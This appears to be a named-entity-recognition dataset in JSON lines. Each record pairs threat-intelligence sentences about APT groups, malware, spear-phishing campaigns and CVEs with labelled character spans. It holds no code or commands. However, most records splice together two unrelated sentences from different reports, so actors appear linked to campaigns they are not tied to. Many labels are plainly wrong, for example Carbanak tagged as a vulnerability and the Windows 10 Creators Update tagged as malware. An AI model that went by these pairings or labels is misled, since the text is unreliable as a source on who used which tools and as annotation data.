malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . 
Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 168, "end": 187, "label": "System"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 260, "end": 266, "label": "System"}, {"start": 269, "end": 285, "label": "Malware"}]} {"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 32, "end": 44, "label": "Organization"}, {"start": 487, "end": 503, "label": "Malware"}]} {"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": [{"start": 36, "end": 42, "label": "Organization"}, {"start": 205, "end": 208, "label": "System"}, {"start": 211, "end": 228, "label": "Indicator"}, {"start": 253, "end": 256, "label": "System"}, {"start": 265, "end": 285, "label": "Indicator"}]} {"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor . 
Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ACTs .", "spans": [{"start": 149, "end": 157, "label": "Malware"}, {"start": 160, "end": 180, "label": "Organization"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 274, "end": 280, "label": "Malware"}]} {"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 184, "end": 200, "label": "Malware"}]} {"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 134, "end": 146, "label": "Malware"}, {"start": 161, "end": 187, "label": "Malware"}, {"start": 223, "end": 243, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}]} {"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . 
LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 123, "end": 132, "label": "System"}, {"start": 228, "end": 234, "label": "Organization"}, {"start": 305, "end": 318, "label": "Organization"}]} {"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points .", "spans": [{"start": 23, "end": 33, "label": "Organization"}, {"start": 157, "end": 172, "label": "Malware"}, {"start": 175, "end": 195, "label": "Organization"}, {"start": 263, "end": 269, "label": "Malware"}]} {"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks .", "spans": [{"start": 132, "end": 136, "label": "Malware"}, {"start": 272, "end": 296, "label": "Organization"}, {"start": 309, "end": 314, "label": "Organization"}]} {"text": "Proofpoint researchers observed one DanaBot affiliate ( Affid 11 ) specifically targeting Canada with \" Canada Post \" themed lures between January 1 and May 1 , 2019 . 
When we first encountered Lurk , in 2011 , it was a nameless Trojan .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 43, "label": "System"}, {"start": 104, "end": 115, "label": "Organization"}, {"start": 194, "end": 198, "label": "Malware"}, {"start": 229, "end": 235, "label": "Malware"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 237, "end": 250, "label": "Organization"}, {"start": 332, "end": 335, "label": "Indicator"}]} {"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": [{"start": 163, "end": 183, "label": "Organization"}, {"start": 292, "end": 294, "label": "Organization"}, {"start": 333, "end": 355, "label": "Organization"}]} {"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . 
In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash .", "spans": [{"start": 124, "end": 135, "label": "Organization"}]} {"text": "In this latest incident , Transparent Tribe registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . We were soon able to help investigate another incident involving Lurk .", "spans": [{"start": 171, "end": 191, "label": "Organization"}, {"start": 275, "end": 279, "label": "Malware"}]} {"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals .", "spans": []} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}]} {"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . 
In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 142, "end": 160, "label": "System"}, {"start": 218, "end": 229, "label": "Malware"}]} {"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 189, "end": 206, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}]} {"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 52, "end": 62, "label": "Organization"}]} {"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . 
As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}, {"start": 260, "end": 264, "label": "Malware"}]} {"text": "In one case from 2013 , the target was sent a malicious document through a spear phishing email message . In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions .", "spans": [{"start": 46, "end": 64, "label": "Malware"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 245, "end": 267, "label": "Organization"}]} {"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 308, "end": 314, "label": "Malware"}, {"start": 322, "end": 326, "label": "Malware"}]} {"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . 
which they launched targeted attacks against Russian banks , businesses and media companies .", "spans": [{"start": 46, "end": 54, "label": "Malware"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 186, "end": 196, "label": "Organization"}, {"start": 201, "end": 216, "label": "Organization"}]} {"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Lurk uses a form of steganography : that's where one file is hidden aACT inside another file of a completely different sort , such as an image , audio , or video file .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 247, "end": 251, "label": "Malware"}]} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}]} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 355, "end": 361, "label": "System"}, {"start": 399, "end": 440, "label": "Organization"}, {"start": 443, "end": 462, "label": "Organization"}, {"start": 465, "end": 481, "label": "Organization"}, {"start": 486, "end": 494, "label": "Organization"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . 
A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}]} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . it reports to was created on August 10 , 2011 .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}]} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 228, "end": 236, "label": "Malware"}]} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 248, "end": 260, "label": "Organization"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 351, "end": 358, "label": "Organization"}, {"start": 388, "end": 396, "label": "Vulnerability"}, {"start": 397, "end": 410, "label": "Vulnerability"}, {"start": 413, "end": 426, "label": "Vulnerability"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 240, "end": 252, "label": "Malware"}, {"start": 284, "end": 309, "label": "Organization"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 222, "end": 246, "label": "Malware"}, {"start": 272, "end": 289, "label": "Malware"}, {"start": 292, "end": 308, "label": "Malware"}, {"start": 315, "end": 321, "label": "Malware"}]} {"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 221, "end": 243, "label": "Malware"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 324, "end": 332, "label": "Vulnerability"}, {"start": 333, "end": 340, "label": "Vulnerability"}, {"start": 343, "end": 356, "label": "Vulnerability"}]} {"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker\u2019s server when the malicious documents were run . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 215, "end": 227, "label": "Malware"}, {"start": 280, "end": 293, "label": "Malware"}]} {"text": "Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . 
While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related .", "spans": [{"start": 189, "end": 202, "label": "Malware"}, {"start": 234, "end": 246, "label": "Malware"}]} {"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families .", "spans": [{"start": 95, "end": 111, "label": "Organization"}, {"start": 302, "end": 323, "label": "Malware"}, {"start": 370, "end": 375, "label": "Malware"}, {"start": 380, "end": 409, "label": "Malware"}]} {"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 255, "end": 262, "label": "System"}, {"start": 267, "end": 275, "label": "Vulnerability"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 286, "end": 299, "label": "Vulnerability"}]} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . 
This migration activity was last observed in October 2016 .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}]} {"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 259, "end": 289, "label": "Malware"}, {"start": 299, "end": 302, "label": "System"}, {"start": 370, "end": 372, "label": "Indicator"}]} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll \u2013 it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}, {"start": 283, "end": 295, "label": "Malware"}, {"start": 300, "end": 311, "label": "Malware"}, {"start": 316, "end": 327, "label": "Malware"}, {"start": 389, "end": 397, "label": "Malware"}]} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 241, "end": 254, "label": "Malware"}, {"start": 353, "end": 360, "label": "Organization"}]} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 186, "end": 202, "label": "Malware"}]} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 271, "end": 287, "label": "Malware"}, {"start": 304, "end": 317, "label": "Malware"}, {"start": 354, "end": 362, "label": "Vulnerability"}, {"start": 363, "end": 370, "label": "Vulnerability"}, {"start": 373, "end": 386, "label": "Vulnerability"}]} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 246, "end": 254, "label": "Malware"}, {"start": 290, "end": 295, "label": "Malware"}, {"start": 298, "end": 311, "label": "Malware"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 327, "end": 332, "label": "Malware"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 286, "end": 291, "label": "Malware"}, {"start": 294, "end": 307, "label": "Malware"}, {"start": 310, "end": 318, "label": "Malware"}, {"start": 323, "end": 328, "label": "Malware"}]} {"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times .", "spans": [{"start": 36, "end": 45, "label": "Organization"}, {"start": 70, "end": 82, "label": "System"}, {"start": 261, "end": 277, "label": "Organization"}]} {"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . Cadelle , uses Backdoor.Cadelspy .", "spans": [{"start": 122, "end": 139, "label": "Malware"}]} {"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . 
Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date .", "spans": [{"start": 153, "end": 161, "label": "Organization"}]} {"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages . Chafer , uses Backdoor.Remexi .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 74, "end": 97, "label": "Organization"}, {"start": 245, "end": 260, "label": "Malware"}]} {"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . Cadelle 's threats are capable of opening a back door and stealing information from victims' computers .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}]} {"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . Chafer , uses Backdoor.Remexi.B .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 143, "end": 160, "label": "Malware"}]} {"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . registrant information points to activity possibly as early as 2011 .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]} {"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . 
These threats are capable of opening a back door and stealing information from victims' computers .", "spans": [{"start": 4, "end": 21, "label": "Organization"}]} {"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . executable compilation times suggest early 2012 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 21, "end": 39, "label": "Organization"}]} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . It's unclear how Cadelle infects its targets with Backdoor.Cadelspy .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 252, "end": 269, "label": "Malware"}]} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . The affected organizations we were able to identify are mostly based in the Middle East .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}]} {"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . one organization is located in the US .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "PLATINUM primarily targets its intended victims using spear phishing . 
There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 89, "end": 108, "label": "Organization"}, {"start": 159, "end": 165, "label": "Malware"}, {"start": 187, "end": 193, "label": "Malware"}]} {"text": "In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Their primary interest appears to be gathering intelligence .", "spans": [{"start": 21, "end": 34, "label": "Organization"}, {"start": 93, "end": 112, "label": "Organization"}]} {"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations . This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant .", "spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 89, "end": 108, "label": "Organization"}, {"start": 220, "end": 233, "label": "Malware"}, {"start": 268, "end": 272, "label": "Malware"}]} {"text": "The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . 
security policy in the Eastern Europe and South Caucasus regions .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 42, "end": 51, "label": "Organization"}, {"start": 56, "end": 76, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}]} {"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 341, "end": 347, "label": "System"}, {"start": 428, "end": 433, "label": "System"}]} {"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": [{"start": 45, "end": 63, "label": "Malware"}, {"start": 183, "end": 189, "label": "System"}, {"start": 195, "end": 216, "label": "Indicator"}, {"start": 265, "end": 270, "label": "Malware"}]} {"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . 
These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}, {"start": 218, "end": 224, "label": "System"}, {"start": 305, "end": 310, "label": "System"}]} {"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Callisto Group appears to be intelligence gathering related to European foreign and security policy .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}]} {"text": "This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . some indications of loosely linked activity dating back to at least 2013 .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 51, "end": 56, "label": "Organization"}, {"start": 74, "end": 81, "label": "Organization"}, {"start": 89, "end": 98, "label": "Organization"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 177, "end": 197, "label": "Organization"}, {"start": 233, "end": 248, "label": "Organization"}]} {"text": "The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . 
In October 2015 , the Callisto Group was observed sending targeted credential phishing emails .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 52, "end": 72, "label": "Organization"}, {"start": 161, "end": 170, "label": "Organization"}, {"start": 195, "end": 209, "label": "Organization"}, {"start": 260, "end": 266, "label": "System"}]} {"text": "On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . In early 2016 , the Callisto Group was observed sending targeted spear phishing emails .", "spans": [{"start": 48, "end": 53, "label": "Organization"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 147, "end": 166, "label": "Organization"}, {"start": 249, "end": 255, "label": "System"}]} {"text": "On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": [{"start": 48, "end": 57, "label": "Organization"}, {"start": 137, "end": 146, "label": "Organization"}, {"start": 151, "end": 170, "label": "Organization"}, {"start": 177, "end": 198, "label": "Indicator"}, {"start": 215, "end": 226, "label": "Malware"}, {"start": 230, "end": 250, "label": "Malware"}]} {"text": "APT16 actors sent spear phishing emails to two Taiwanese media organizations . 
